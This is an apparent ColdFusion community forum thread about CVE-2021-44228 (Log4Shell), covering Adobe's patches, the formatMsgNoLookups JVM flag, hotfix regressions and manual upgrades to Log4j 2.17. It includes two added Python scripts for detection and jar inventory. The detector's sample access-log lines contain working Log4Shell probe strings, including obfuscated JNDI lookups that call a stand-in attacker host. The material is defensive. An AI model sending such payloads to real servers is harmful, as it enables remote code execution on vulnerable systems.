zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228)

Explorer, Dec 10, 2021


Does anyone know if the zero-day exploit affecting the popular Apache Log4j utility (CVE-2021-44228) that was announced on 12/9/2021 will affect ColdFusion version 10 and 2018?

Views: 37.2K


1 Correct answer

Adobe Employee, Dec 14, 2021

Hi Everyone,


We had originally published (on Dec 14) some workaround/mitigation steps in this article until the patch would be released. Since then, there have been updates and still further updates.

 

Dec 14: Technote with initial mitigations offered:

https://helpx.adobe.com/coldfusion/kb/log4j-vulnerability-coldfusion.html

 

Update Dec 17: Updates for CF2021 and 2018 were released, addressing this log4j vulnerability. The technote mentioned above was a preliminary response, offered on Dec 14.

...

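Before deciding whether a given ColdFusion instance needs anything beyond the patch, most responders first want to know whether it was being probed at all. The script below is an added example, not part of this thread and not Adobe's guidance: it runs over constructed web-server access-log lines (203.0.113.0/24 documentation addresses) and flags CVE-2021-44228 lookup strings, including the percent-encoded and nested-lookup obfuscations (`${${lower:j}ndi:...}`, `${${::-j}${::-n}...}`, `${${env:NaN:-j}ndi:...}`) that slip past a plain `${jndi:` match. Its expansion rules are deliberately aggressive (any lookup it cannot resolve expands to nothing), which is the right bias for detection but is not how Log4j itself evaluates lookups.

```python
"""Flag Log4Shell (CVE-2021-44228) probe strings in access-log lines.

Added example, not from the original thread. SAMPLE_LOG is constructed;
the addresses are from the 203.0.113.0/24 documentation range.
"""
import re
from urllib.parse import unquote

INNER = re.compile(r"\$\{([^${}]*)\}")  # a ${...} with nothing nested inside it
JNDI = re.compile(r"\$\{jndi:", re.I)


def resolve_inner(expr):
    """Expand one innermost lookup the way an attacker expects Log4j to.

    ${::-j} and ${env:NaN:-j} use the default-value syntax and yield 'j';
    ${lower:X} / ${upper:x} change case. Anything else is assumed to expand
    to nothing, which is aggressive on purpose: it is a detector, not Log4j.
    """
    if ":-" in expr:
        return expr.split(":-", 1)[1]
    name, _, arg = expr.partition(":")
    name = name.lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return ""


def normalize(text, max_rounds=32):
    """Percent-decode, then collapse nested lookups until only ${jndi:...} remain."""
    text = unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            expr = m.group(1)
            if expr.lower().startswith("jndi:"):
                return m.group(0)  # keep the outermost payload intact for reporting
            changed = True
            return resolve_inner(expr)

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def find_log4shell(lines):
    """Return (line_number, normalized_payload) for every line carrying a JNDI lookup."""
    hits = []
    for no, line in enumerate(lines, 1):
        norm = normalize(line)
        m = JNDI.search(norm)
        if m:
            end = norm.find("}", m.start())
            hits.append((no, norm[m.start():end + 1 if end != -1 else None]))
    return hits


# Constructed access-log lines: one benign, four probes, one non-JNDI lookup probe.
SAMPLE_LOG = [
    '203.0.113.9 - - [10/Dec/2021:03:14:07 +0000] "GET /index.cfm HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:03:14:09 +0000] "GET /index.cfm HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:03:14:11 +0000] "GET /login.cfm HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7/x}"',
    '203.0.113.7 - - [10/Dec/2021:03:14:12 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2F203.0.113.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.7 - - [10/Dec/2021:03:14:15 +0000] "GET /index.cfm HTTP/1.1" 200 512 "${${env:NaN:-j}ndi:rmi://203.0.113.7/o}" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:03:15:00 +0000] "GET /?user=${env:HOME} HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for no, payload in find_log4shell(SAMPLE_LOG):
        print(f"line {no}: {payload}")
```

A hit means the string was sent to the server, not that a vulnerable Log4j logged it; pair the timestamps with the instance's jar inventory and with outbound LDAP/RMI connection logs before calling it an intrusion. The last sample line carries a non-JNDI lookup and is reported as clean by design.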
188 Replies
Community Beginner, Dec 21, 2021


Is there an update on this specific request to have only this issue addressed? We're experiencing an issue with cumulative patches where our QoQ are breaking. Per another post Adobe has a fix for it but we won't have time to test it all.

Community Beginner, Dec 17, 2021


I'm still using CF10, which based on this thread seems like it's probably not affected by this exploit. But, if I do add the "-Dlog4j2.formatMsgNoLookups=true" to my java args, will it be a problem?

Community Expert, Dec 18, 2021


Quoting @Whatfore:

I'm still using CF10, which based on this thread seems like it's probably not affected by this exploit. But, if I do add the "-Dlog4j2.formatMsgNoLookups=true" to my java args, will it be a problem?

 

I think it won't be a problem. However, I would suggest that you don't add it. 

 

It is bad practice to initialize variables that are never used anywhere in your application. The same applies here. After all, -Dlog4j2.formatMsgNoLookups=true is just Java initialization code.

Community Beginner, Dec 18, 2021


It appears something else changed besides log4j in the hotfix v3 for 2021

QoQ started returning: java.lang.UnsupportedOperationException: getColumnType() at coldfusion.sql.QueryTableMetaData.getColumnType(QueryTableMetaData.java:783) at coldfusion.sql.QueryTableMetaData.getColumnType(QueryTableMetaData.java:773)

 

Query is basic:

<cfquery name="retVal.currSum" dbtype="query">
SELECT rs_name,
SUM(last_count) AS last_count,
SUM(proj_amount) AS PROJ_AMOUNT
FROM retVal.Curr
GROUP BY rs_name
</cfquery>

 

Adding cast() didn't help either

<cfquery name="retVal.currSum" dbtype="query">
SELECT rs_name,
SUM(CAST(last_count AS INTEGER)) AS last_count,
SUM(CAST(proj_amount AS DOUBLE)) AS PROJ_AMOUNT
FROM retVal.Curr
GROUP BY rs_name
</cfquery>

 

Community Beginner, Dec 18, 2021


looks like Update 3 removed hotfixes that might have been applied such as hf202100-4212383.jar. Re-installing fixed.

Community Expert, Dec 18, 2021


Quoting @rgjason2:

It appears something else changed besides log4j in the hotfix v3 for 2021

QoQ started returning: java.lang.UnsupportedOperationException: getColumnType() at coldfusion.sql.QueryTableMetaData.getColumnType(QueryTableMetaData.java:783) [...]

 

If so, please create a bug ticket.

New Here, Dec 18, 2021


My developer faced a similar issue - probably the GROUP BY doing it.

Community Expert, Dec 18, 2021


The solution is to add the jar that was offered for update 2 (and 12, for cf2021).

 

See:

https://tracker.adobe.com/#/view/CF-4212383

 

As the Adobe info (in some pages) on the update says, they did not incorporate ANY current fixes to ANY bugs in update 2 (or 12). They ONLY updated the log4j libraries. 


/Charlie (troubleshooter, carehart.org)

Community Beginner, Dec 18, 2021


@Priyank Shrivastava. What is happening with the extra DoS vulnerability in log4j 2.16? This has now been updated to 2.17.

 

Will Adobe be updating the hotfix? Should we manually update?

Community Beginner, Dec 18, 2021


Hmm,

 

A quick manual try on a local vbox to 2.17 gives a bunch of errors after CF restart.

 

Going back to 2.16 after that, same. Err...

 

 

Community Expert, Dec 19, 2021


 

 

Quoting @aarnir71156744:

A quick manual try on a local vbox to 2.17 gives a bunch of errors after CF restart.

 

Could you please share the error messages you got.

Community Beginner, Dec 19, 2021


Sorry, my mistake. I accidentally removed log4j.jar too. Now changed to 2.17 and running OK. CF2021 in a VBox Ubuntu 20.04 LTS test machine with:

log4j-api-2.17.0.jar
log4j-core-2.17.0.jar
log4j-to-slf4j-2.17.0.jar

 

No errors or warnings.

 

Did not do this on the production machine yet though.

Community Expert, Dec 18, 2021


Quoting @w49369461:

@Priyank Shrivastava. What is happening with the extra DoS vulnerability in log4j 2.16? This has now been updated to 2.17.

 

Yes, indeed. Even the new log4j 2.16 has been found to be vulnerable. It could enable an attacker to generate infinite recursive lookups, leading to a denial of service.

 

https://logging.apache.org/log4j/2.x/

 

Let's wait for Adobe's solution. In the meantime, I think the JVM flag, 

-Dlog4j2.formatMsgNoLookups=true

 remains an effective preventive measure even against this new vulnerability. Unless, of course, your application requires lookups. 

 

Adobe Employee, Dec 18, 2021


Hi All,

 

We are looking into this and I will update the thread with more details. 

Thanks,
Priyank Shrivastava

Explorer, Dec 20, 2021


Hi Priyank.

After we apply CF 2018 hotfix 13, we still see log4j-1.2.15.jar in the <cfinstance>/lib directory. When we try to remove it, we get 500 errors. Will this file be patched or removed? I am being told this is still a vulnerability.

Thank you,
Jeff

Adobe Employee, Dec 20, 2021


Hi Jeff,

 

In one of the comments, I clarified that log4j-1.2.15.jar is not vulnerable anymore. We have patched it and it is safe to use. 

 

I understand that it will be flagged by your scanner; however, with update 3 it is secure.

 

Also, CF is not impacted by the recent CVE that was fixed in 2.17, however, you can still update the CORE jar to 2.17. 

Thanks,
Priyank Shrivastava

Community Expert, Dec 20, 2021


[deleted]

Community Expert, Dec 20, 2021


 

Quoting @Priyank Shrivastava:

Also, CF is not impacted by the recent CVE that was fixed in 2.17, ...

 

Hi Priyank,

I beg to disagree. If Log4j v2.16 is susceptible to a denial-of-service vulnerability and ColdFusion is equipped with Log4j v2.16, then ColdFusion will likewise be susceptible. 

Adobe Employee, Dec 20, 2021


Hi @BKBK 

 

I was also not convinced; however, we did analyze it, and I am sharing the details based on the team's comment.

 

Thanks,
Priyank Shrivastava

Adobe Employee, Dec 20, 2021


Also, we are asking users to upgrade the CORE library to 2.17. We will share more details in our article. 

 

Thanks,
Priyank Shrivastava

Community Beginner, Dec 20, 2021


I have updated manually to 2.17 both Core and API and there appears to be no issues.

 

 

Community Beginner, Dec 20, 2021


Same with production machine now and seems to run just fine. CF2021 Standard, Ubuntu 20.04 Server LTS with:

log4j-api-2.17.0.jar
log4j-core-2.17.0.jar
log4j-to-slf4j-2.17.0.jar

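Several posts above replace log4j-api, log4j-core and log4j-to-slf4j by hand, one asks whether the log4j-1.2.15.jar left in the lib directory matters, and another asks whether adding -Dlog4j2.formatMsgNoLookups=true to the JVM arguments is safe. The inventory script below is an added example (not Adobe's tooling and not posted in this thread) that turns those checks into something repeatable: it lists every log4j jar in a lib directory, reads the version from META-INF/maven/.../pom.properties or the MANIFEST.MF Implementation-Version (falling back to the file name), checks whether a pre-2.16 core jar still contains JndiLookup.class, and reports whether jvm.config carries the flag. The jvm.config location (cfusion/bin/jvm.config, java.args= line) is an assumption, and the jars it scans are tiny constructed stand-ins built in a temporary directory, not real Log4j binaries. One caveat on the flag: it only disables lookups in the logged message text, so it says nothing about the recursion issue fixed in 2.17.0, which is in context lookups used by layout patterns; treat the core jar version as the thing to act on, and treat a LOG4J1 result as "not the CVE-2021-44228 code base" rather than "clean".

```python
"""Inventory Log4j jars in a ColdFusion lib directory and classify each one.

Added example, not Adobe's code. Assumptions: the version is read from
META-INF/maven/<group>/<artifact>/pom.properties, then MANIFEST.MF
Implementation-Version, then the file name; the JVM flag is looked for on
the java.args= line of cfusion/bin/jvm.config. The fixture jars built by
build_sample_lib() are constructed stand-ins, not real Log4j binaries.
"""
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED = (2, 17, 0)  # 2.x version the thread settles on
NAME_RE = re.compile(r"log4j(?:-[a-z0-9-]+?)?-(\d+(?:\.\d+)+)\.jar$", re.I)
NO_LOOKUPS_FLAG = "-Dlog4j2.formatMsgNoLookups=true"


def version_of(zf, name):
    """Best-effort version string for one jar: pom.properties, manifest, file name."""
    for member in zf.namelist():
        if member.startswith("META-INF/maven/") and member.endswith("pom.properties"):
            for line in zf.read(member).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    if "META-INF/MANIFEST.MF" in zf.namelist():
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
        if m:
            return m.group(1)
    m = NAME_RE.search(name)
    return m.group(1) if m else "unknown"


def as_tuple(version):
    """'2.16.0' -> (2, 16, 0); anything unparsable sorts below every real release."""
    return tuple(int(x) for x in re.findall(r"\d+", version)[:3]) or (0,)


def classify(name, version, has_jndi_lookup):
    """Status for one jar, following the advice given in the thread."""
    vt = as_tuple(version)
    if vt[0] == 1:
        return "LOG4J1: CVE-2021-44228 does not apply to the 1.x code base; verify the vendor patch level"
    if "core" in name.lower():
        if vt < (2, 16, 0) and has_jndi_lookup:
            return "VULNERABLE: JndiLookup.class present, replace core"
        if vt < (2, 16, 0):
            return "MITIGATED: JndiLookup.class removed, still replace core"
        if vt < FIXED:
            return "UPDATE: 2.16.x, move core to 2.17.0 (recursion DoS)"
        return "OK"
    return "OK" if vt >= FIXED else "UPDATE: bring api/bridge jars to the same version as core"


def scan_lib(lib_dir):
    """Return one record per log4j*.jar under lib_dir."""
    report = []
    for fname in sorted(os.listdir(lib_dir)):
        if "log4j" not in fname.lower() or not fname.lower().endswith(".jar"):
            continue
        with zipfile.ZipFile(os.path.join(lib_dir, fname)) as zf:
            version = version_of(zf, fname)
            has_jndi = JNDI_LOOKUP in zf.namelist()
        report.append({"jar": fname, "version": version, "jndi_lookup": has_jndi,
                       "status": classify(fname, version, has_jndi)})
    return report


def no_lookups_flag_set(jvm_config_path):
    """True if the java.args= line of jvm.config carries the formatMsgNoLookups flag."""
    if not os.path.isfile(jvm_config_path):
        return False
    with open(jvm_config_path, encoding="utf-8", errors="replace") as f:
        return any(line.startswith("java.args=") and NO_LOOKUPS_FLAG in line for line in f)


def build_sample_lib(root):
    """Constructed fixture: one jar per state discussed in the thread (not real Log4j jars)."""
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    fixtures = {  # file name -> (Implementation-Version, ship JndiLookup.class?)
        "log4j-core-2.13.3.jar": ("2.13.3", True),   # unpatched pre-2.16 core
        "log4j-core-2.16.0.jar": ("2.16.0", True),   # 2.16 core, as the thread describes the Dec 17 updates
        "log4j-api-2.17.0.jar": ("2.17.0", False),
        "log4j-1.2.15.jar": ("1.2.15", False),       # 1.x jar still present after the update
    }
    for fname, (ver, with_jndi) in fixtures.items():
        with zipfile.ZipFile(os.path.join(lib, fname), "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\nImplementation-Version: {ver}\n")
            if with_jndi:
                zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    cfg = os.path.join(bindir, "jvm.config")
    with open(cfg, "w", encoding="utf-8") as f:
        f.write("java.args=-server -Xmx1024m " + NO_LOOKUPS_FLAG + "\n")
    return lib, cfg


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        lib, cfg = build_sample_lib(tmp)
        for row in scan_lib(lib):
            print(f"{row['jar']:<24} {row['version']:<8} {row['status']}")
        print("formatMsgNoLookups flag in jvm.config:", no_lookups_flag_set(cfg))
```

Run it against a real instance by calling scan_lib() on the actual lib directory and no_lookups_flag_set() on the actual jvm.config instead of the fixture; a VULNERABLE or UPDATE line is the jar to replace, and the filename-based scanner complaint about log4j-1.2.15.jar shows up as LOG4J1, which is a different question from the one this thread is about.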
Adobe Employee, Dec 21, 2021


Hi All,

 

We have released an article with updated jar 2.17 which you can replace in your server. Here I am sharing the article, please follow it and let me know in case of any issue.

https://helpx.adobe.com/coldfusion/kb/log4j-2-16-vulnerability-coldfusion.html

 

Thanks,
Priyank Shrivastava

Engaged, Dec 21, 2021


It is wonderful that you guys are following and updating these vulnerabilities as they come up.  Kudos for that!  Thank you.  However, it seems the only place these are being socialized is within the comments of this blog post.  These should also be posted to Adobe's Product Security Incident Response Team page I would think.  I see no mention of any of this there.  https://helpx.adobe.com/security.html#coldfusion

I do see that the larger updates (2021 update 3 and 2018 update 13) are posted to the usual ColdFusion updates page. So that's good.  But now you have another "patch" to be applied after the latest updates and I see no mention of that anywhere but here in the comments.

Please update the Adobe site as well with this information for people to find when they look for ColdFusion updates in the future.  The update process with ColdFusion is unnecessarily difficult because we have to look in so many different places to find out what to do.

Community Beginner, Dec 21, 2021


It would also be nice if these security updates would be able to be released without being cumulative.

 

Updating to these hotfixes has required a number of emails to Adobe to get hotfixes for known issues that we cannot test against due to the urgency.

 

 
